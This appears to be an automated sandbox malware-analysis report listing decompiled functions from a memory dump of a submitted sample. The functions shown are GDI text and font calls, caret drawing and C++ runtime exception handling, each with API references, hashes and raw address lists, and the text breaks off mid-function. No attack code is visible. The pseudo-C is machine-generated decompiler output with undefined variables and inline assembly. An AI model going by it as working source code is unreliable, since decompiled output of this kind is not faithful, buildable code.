Function 001A2E20 Relevance: 16.7, APIs: 11, Instructions: 228COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 001A2F2E
CreateFontIndirectW.GDI32 ref: 001A2F58
ReleaseDC.USER32 ref: 001A2F83
SelectObject.GDI32 ref: 001A2FA8
GetTextMetricsW.GDI32 ref: 001A2FC4
GetTextFaceW.GDI32 ref: 001A3003
SelectObject.GDI32 ref: 001A3027
ReleaseDC.USER32 ref: 001A3046
GetCPInfo.KERNEL32 ref: 001A30E8
DeleteObject.GDI32 ref: 001A3135
DeleteObject.GDI32 ref: 001A317E

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
String ID:
API String ID: 2170087643-0
Opcode ID: eb4e933d5cb20131311116cbe32ad9572f071e12f3db2b9f5b8319cc17a2d441
Instruction ID: 3f52abf43c36f91c01b6279cc204a8132080206eb984ec45e385b3e6b388f1cb
Opcode Fuzzy Hash: eb4e933d5cb20131311116cbe32ad9572f071e12f3db2b9f5b8319cc17a2d441
Instruction Fuzzy Hash: 5CB16178A042089FCB14DF68D588BADBBF1FF49314F1584A9E899DB361D734EA84CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B7A82 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E001B7A82(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E001B8C58(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E001B1BDC(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E001B79E9(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E001B425E(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E001B7232(_t203, _t204, _t216, _t219, _a28, __eflags);
					E001B8C75(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E001B7429(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E001B422E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E001B1C6E(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E001B1C6E(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E001B7EA7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E001B41BE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E001B781D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E001ADC55(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E001B7642();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E001B7642();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E001B117B(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E001B740A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x1c48c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E001ADC55(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E001B73C6( &_v64);
											E001B8D05( &_v64, 0x1c328c);
											L64:
											 *((intOrPtr*)(E001B1C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E001B1C6E(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E001B425E(_t204, _t225, _t202);
											L001B731A(_a8, _a16, _t218);
											_t166 = E001B7332(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E001B76DC(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x001b7a82
0x001b7a8b
0x001b7a94
0x001b7a9a
0x001b7aa2
0x001b7aa4
0x001b7aa7
0x001b7aad
0x001b7e21
0x001b7e21
0x001b7e26
0x001b7e2a
0x001b7e2e
0x001b7e2f
0x001b7e32
0x001b7e33
0x001b7e34
0x001b7e37
0x001b7e39
0x001b7e3c
0x001b7e3d
0x001b7e3e
0x001b7e41
0x001b7e46
0x001b7e46
0x001b7e49
0x001b7e4c
0x001b7e4e
0x001b7e50
0x001b7e50
0x001b7e56
0x001b7e5b
0x001b7e5e
0x001b7e60
0x001b7e63
0x001b7e66
0x001b7e67
0x001b7e75
0x001b7e7a
0x001b7e7f
0x001b7e82
0x001b7e85
0x001b7e88
0x001b7e8b
0x001b7e8c
0x001b7e8f
0x001b7e97
0x001b7e99
0x001b7e9d
0x00000000
0x001b7e9d
0x001b7ea6
0x001b7abc
0x001b7abc
0x001b7ac5
0x001b7bc2
0x001b7bc2
0x001b7bc5
0x00000000
0x001b7af4
0x001b7af4
0x001b7af9
0x00000000
0x001b7aff
0x001b7aff
0x001b7b07
0x001b7dbf
0x001b7dbf
0x001b7b0d
0x001b7b12
0x001b7b15
0x001b7b1a
0x001b7b21
0x001b7b26
0x00000000
0x001b7b5e
0x001b7b66
0x001b7bca
0x001b7bca
0x001b7bcd
0x001b7bd0
0x001b7bd2
0x001b7bd5
0x001b7bd8
0x001b7bde
0x001b7d8a
0x001b7d8a
0x001b7d8d
0x00000000
0x001b7d8f
0x001b7d8f
0x001b7d92
0x00000000
0x001b7d98
0x001b7da8
0x001b7dad
0x00000000
0x001b7dad
0x001b7d92
0x001b7be4
0x001b7be4
0x001b7be8
0x00000000
0x001b7bee
0x001b7bee
0x001b7bf5
0x001b7c0d
0x001b7c0d
0x001b7c10
0x001b7c13
0x001b7c29
0x001b7c2e
0x001b7c31
0x001b7c34
0x001b7c37
0x001b7c3a
0x001b7c3d
0x001b7c40
0x001b7c46
0x001b7c46
0x001b7c49
0x001b7c4c
0x001b7c5b
0x001b7c5c
0x001b7c5c
0x001b7c5e
0x001b7c61
0x001b7c67
0x001b7c6a
0x001b7c70
0x001b7c72
0x001b7c75
0x001b7c78
0x001b7c7e
0x001b7c81
0x001b7c86
0x001b7c86
0x001b7c89
0x001b7c8c
0x001b7c8f
0x001b7c92
0x001b7c95
0x001b7c9a
0x001b7c9b
0x001b7c9c
0x001b7c9d
0x001b7c9e
0x001b7ca1
0x001b7ca4
0x001b7ca6
0x00000000
0x001b7ca8
0x001b7ca8
0x001b7caf
0x001b7cb4
0x001b7cb7
0x001b7cb9
0x00000000
0x00000000
0x001b7cbb
0x001b7cbe
0x001b7cbf
0x001b7cc2
0x001b7cc4
0x00000000
0x001b7cc6
0x001b7cc6
0x001b7cc9
0x00000000
0x001b7cc9
0x00000000
0x001b7cc4
0x001b7cdd
0x001b7ce3
0x001b7ce6
0x001b7ce9
0x001b7cec
0x001b7ced
0x001b7cf2
0x001b7cf3
0x001b7cf6
0x001b7cf9
0x001b7cfc
0x001b7cff
0x001b7d00
0x001b7d05
0x001b7d05
0x001b7d08
0x001b7d08
0x00000000
0x001b7ccc
0x001b7ccc
0x001b7ccd
0x001b7cd0
0x001b7cd3
0x001b7cd6
0x001b7cd6
0x00000000
0x001b7cdb
0x001b7c78
0x001b7c6a
0x001b7d0b
0x001b7d0e
0x001b7d0f
0x001b7d12
0x001b7d15
0x001b7d18
0x001b7d1b
0x001b7d1b
0x001b7d24
0x001b7d27
0x001b7d27
0x001b7c40
0x001b7d2a
0x001b7d2e
0x001b7d30
0x001b7d33
0x001b7d39
0x001b7d39
0x001b7d41
0x001b7d46
0x001b7db0
0x001b7db0
0x001b7db5
0x001b7db9
0x00000000
0x00000000
0x00000000
0x00000000
0x001b7d48
0x001b7d4b
0x001b7d4e
0x001b7d52
0x001b7d60
0x001b7d62
0x001b7d79
0x001b7d7d
0x001b7d83
0x001b7d84
0x001b7d86
0x00000000
0x001b7d88
0x00000000
0x001b7d88
0x00000000
0x00000000
0x00000000
0x001b7d54
0x001b7d54
0x001b7d56
0x00000000
0x001b7d58
0x001b7d58
0x001b7d5c
0x00000000
0x001b7d5e
0x001b7d64
0x001b7d69
0x001b7d6c
0x001b7d71
0x001b7d74
0x00000000
0x001b7d74
0x001b7d5c
0x001b7d56
0x001b7d52
0x001b7bf7
0x001b7bf7
0x001b7bfe
0x00000000
0x001b7c00
0x001b7c00
0x001b7c07
0x00000000
0x00000000
0x00000000
0x00000000
0x001b7c07
0x001b7bfe
0x001b7bf5
0x001b7be8
0x001b7b68
0x001b7b70
0x001b7b73
0x001b7b78
0x001b7b7c
0x001b7b7f
0x001b7b85
0x001b7b88
0x00000000
0x001b7b8a
0x001b7b8a
0x001b7b8d
0x001b7b8f
0x001b7dc0
0x001b7dc0
0x00000000
0x001b7b95
0x001b7b9d
0x001b7ba8
0x00000000
0x00000000
0x001b7bb1
0x001b7bb4
0x001b7bb5
0x001b7bb8
0x001b7bba
0x00000000
0x001b7bc0
0x00000000
0x001b7bc0
0x00000000
0x001b7bba
0x001b7b95
0x001b7dc5
0x001b7dc5
0x001b7dc7
0x001b7dc8
0x001b7dcf
0x001b7dd2
0x001b7de0
0x001b7de5
0x001b7dea
0x001b7ded
0x001b7df2
0x001b7df5
0x001b7df8
0x001b7dfa
0x001b7dfc
0x001b7dfc
0x001b7e01
0x001b7e0d
0x001b7e13
0x001b7e18
0x001b7e1b
0x001b7e1c
0x00000000
0x001b7e1c
0x001b7b88
0x001b7b66
0x001b7b26
0x001b7b07
0x001b7af9
0x001b7ac5

APIs

type_info::operator==.LIBVCRUNTIME ref: 001B7BA1
___TypeMatch.LIBVCRUNTIME ref: 001B7CAF
CatchIt.LIBVCRUNTIME ref: 001B7D00
_UnwindNestedFrames.LIBCMT ref: 001B7E01
CallUnexpected.LIBVCRUNTIME ref: 001B7E1C

Strings

csm, xrefs: 001B7ABF
csm, xrefs: 001B7BD8
csm, xrefs: 001B7B2C

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: e16ce0a44f9451b2a9cd1c9e351dca73ffb7c5330aaff0119715ebe7e9a3fadb
Instruction ID: 6909c35bf7faaccd922793119c9b70b0997b92dc2e0316d267fc633dbb678fb0
Opcode Fuzzy Hash: e16ce0a44f9451b2a9cd1c9e351dca73ffb7c5330aaff0119715ebe7e9a3fadb
Instruction Fuzzy Hash: 86B18A31808209AFCF29DFA4C9819EEBBB5FFA4310F15455AF8016B292D731EA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001AA250 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 001AA31C
GetFocus.USER32 ref: 001AA33E
HideCaret.USER32 ref: 001AA36D
InvertRect.USER32 ref: 001AA383
InvertRect.USER32 ref: 001AA3DA
ReleaseDC.USER32 ref: 001AA3F6
GetFocus.USER32 ref: 001AA40B
ShowCaret.USER32 ref: 001AA43A

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CaretFocusInvertRect$HideReleaseShow
String ID:
API String ID: 1353628544-0
Opcode ID: 1f0594c19982ae54dd4938fb4a9db39d78fd8a5544c50a09f2950aaf6a70b490
Instruction ID: 8ed437a653cb83d2b1d9f483c38cf29f2cba38760d0014c899890f397c3d6259
Opcode Fuzzy Hash: 1f0594c19982ae54dd4938fb4a9db39d78fd8a5544c50a09f2950aaf6a70b490
Instruction Fuzzy Hash: B361A278A00209DFCB04DF68C188AAEBBB1FF09311F558469E849DB361E735ED95CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001A2980 Relevance: 10.7, APIs: 7, Instructions: 190COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 001A29C6

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CreateEvent
String ID:
API String ID: 2692171526-0
Opcode ID: 2d90fb6404f6431946d7c21ed0aa2f25b9f334b903b3e8ab29575a8b877283d4
Instruction ID: f5baa645e017a2b9fa4b534016075efab9dcd67e934ba535856feb3cb3a063d4
Opcode Fuzzy Hash: 2d90fb6404f6431946d7c21ed0aa2f25b9f334b903b3e8ab29575a8b877283d4
Instruction Fuzzy Hash: 039108B4908209DFDB04DFA8C4487AEBBF0FB49314F11852EE8659B394D7789588CF92

Uniqueness

Uniqueness Score: -1.00%

Function 001ADED0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E001ADED0(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1358;
				void* _t1359;
				void* _t1365;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E001BAEA1(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0x1c4050;
				E001ADE90(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0x1c4050);
				E001B20D7(_a12);
				_t1005 = _a4;
				_t1359 = _t1358 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E001B20C0(_t1250, 0xfffffffe, _t1347, 0x1c4050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E001B2060(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1365 = _t1014;
								if(_t1365 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E001ADE90(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1365 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0x1bc628;
											if(__eflags != 0) {
												_t1245 = E001B1EB0(__eflags, 0x1bc628);
												_t1359 = _t1359 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0x1bc628; // 0x1adc55
													 *0x1c7000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1359 = _t1359 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E001B20A0(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E001B20C0(_t1017, _t1342, _t1347, 0x1c4050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E001ADE90(_t1250, _t1334, _t1342, _t1347, _v12);
										E001B2080();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L528;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L528;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
